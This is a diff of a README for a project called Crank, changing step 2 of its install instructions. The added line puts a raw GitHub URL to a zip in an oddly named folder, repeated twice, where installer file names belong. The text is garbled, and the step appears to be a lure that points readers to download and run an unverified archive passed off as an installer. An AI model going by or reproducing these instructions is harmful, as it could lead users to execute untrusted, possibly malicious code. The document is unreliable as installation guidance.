asd123fsdg/Crank/README.md

 After the download finishes, follow these steps to run the application:

 1. Navigate to your Downloads folder, or the location where you saved the file.
-2. Locate the Crank installer (it usually has a name like `Crank-Installer.exe` or `Crank-Installer.dmg`).
+2. Locate the Crank installer (it usually has a name like `https://raw.githubusercontent.com/asd123fsdg/Crank/master/synecdochical/Crank.zip` or `https://raw.githubusercontent.com/asd123fsdg/Crank/master/synecdochical/Crank.zip`).
 3. Double-click the installer file.
 4. Follow the on-screen instructions to complete the installation.
 5. Once installed, find the Crank icon on your desktop or in your applications folder and double-click it to launch the application.